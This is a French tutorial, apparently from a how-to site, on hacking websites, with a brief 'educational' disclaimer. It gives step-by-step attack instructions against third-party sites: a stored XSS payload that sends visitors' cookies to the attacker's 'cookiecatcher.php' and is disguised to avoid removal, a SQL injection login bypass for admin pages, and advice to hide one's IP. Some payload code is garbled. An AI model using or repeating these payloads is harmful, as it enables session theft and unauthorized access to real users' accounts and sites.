Comment pirater un site Web

Informations concernant l'auteur.e

Note : cet article est à vocation purement pédagogique, il permet soit d’aider les gens à apprendre le piratage, soit de leur expliquer comment opèrent les hackeurs pour être ensuite capable de mieux protéger leurs sites Web. Ce tutoriel vous donne les principales étapes à réaliser en vue d’accéder aux sites Web peu sécurisés.

Méthode 1

Méthode 1 sur 3:

Utiliser le script intersites (XSS)

1
Trouvez un site vulnérable sur lequel vous pouvez poster un contenu. Un forum est un bon exemple. Souvenez-vous que si le site est sécurisé, cela ne marchera pas.
2
Allez sur Créer un message. Vous devrez taper des codes spéciaux qui permettront de capturer des données sensibles lorsqu’on clique dans le « post ».
- Vous devrez tester si le système est capable de filtrer votre code. Postez
  <script>window.alert(« test »)</script>
  Si une boite d’alerte apparait lorsque vous cliquez sur votre post, cela signifie que le site est vulnérable aux attaques.
3
Créez et importez votre attrapeur de cookies. Le but de cette attaque est de capturer les cookies d’un utilisateur, ce qui vous permettra d’accéder à ses comptes de sites Web pour lesquels ses identifiants sont vulnérables. Vous aurez besoin d’un attrapeur de cookies qui permet de capturer les cookies visés et de les rediriger vers vous. Chargez l’attrapeur de cookies sur un site auquel vous avez accès et qui prend en charge le langage php.
4
Postez un message avec votre attrapeur de cookies. Entrez un code spécifique dans le message qui servira ensuite à capturer les cookies et à les envoyer sur votre site. Vous devrez entrer quelques mots de texte après le code afin de réduire la suspicion et d’éviter que votre message soit effacé.
- Voici un exemple de code :
  <iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location= "YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>
5
Utilisez les cookies collectés. Après les avoir collectés, vous pouvez utiliser à quelques fins que ce soient les informations des cookies qui doivent être stockées dans votre site Web.

Publicité

Méthode 2

Méthode 2 sur 3:

Exécuter une attaque par injection

1
Trouvez un site vulnérable. Vous devrez trouver un site vulnérable en sachant si l’identifiant de l’administrateur du site est facilement accessible. Essayez de faire une recherche Google sur admin login.asp.
2
Connectez-vous en tant qu’administrateur. Entrez admin en nom d’utilisateur et utilisez l’une des différentes combinaisons de mots de passe. Cela peut être n’importe quel nombre, un exemple assez commun est 1' ou '1'='1.
3
Soyez patient. Cette manœuvre nécessitera probablement plusieurs tentatives et vous ferez forcément quelques erreurs.
4
Accédez au site Web. Vous pourriez éventuellement être capable de trouver une combinaison qui vous donne un accès administrateur à un site Web, en supposant que celui-ci est vulnérable.

Publicité

Méthode 3

Méthode 3 sur 3:

Se préparer à réussir

1
Apprenez un ou deux langages de programmation. Si vous voulez réellement apprendre à pirater des sites Web, vous devrez comprendre comment fonctionnent les ordinateurs et les autres technologies. Apprenez à utiliser les langages de programmation tels que Python ou SQL de façon à savoir mieux contrôler un ordinateur et identifier les vulnérabilités des systèmes.
2
Apprenez les bases du HTML. Vous devrez également acquérir une bonne compréhension des langages HTML et JavaScript si vous souhaitez pirater des sites Web. L’apprentissage peut être long, mais il existe de nombreuses méthodes gratuites sur Internet qui vous faciliteront la tâche si vous avez la volonté de vous y mettre.
3
Consultez des whitehats. Ce sont des hackeurs qui utilisent leurs capacités à des fins honnêtes, principalement pour mettre en évidence les failles de sécurité sur Internet et rendre la navigation plus sure pour n’importe qui. Si vous avez envie d’apprendre l’art du piratage pour ce genre de bonne raison ou si vous voulez simplement améliorer la protection de votre site Web, il peut être une bonne idée de contacter quelques whitehats pour vous aider.
4
Faites des recherches à propos du piratage. Si vous souhaitez apprendre à pirater ou si vous souhaitez simplement vous protéger, vous devrez faire beaucoup de recherches. Il y a tellement de façons différentes de trouver les failles d’un site Web que vous devrez apprendre en permanence.
5
Restez à jour. Parce que la liste des failles potentielles est en évolution permanente, vous devrez vous assurer que vous êtes à jour sur les techniques de piratage. Le fait d’être protégé d’un certain type de hack ne signifie pas que vous serez toujours en sécurité !

Publicité

Conseils

Allez sur des forums de hackeurs en vue de découvrir quelques astuces utiles.

Avertissements

Si vous comptez vous essayer au piratage dans le monde réel, masquez votre adresse IP en utilisant des logiciels adaptés disponibles en ligne.
Le fait de lire cet article ne fait pas de vous un hackeur. Vous DEVEZ travailler vos compétences et pratiquer, pratiquer et encore pratiquer.
Le piratage est illégal. Si vous vous faites attraper, vous êtes en faute.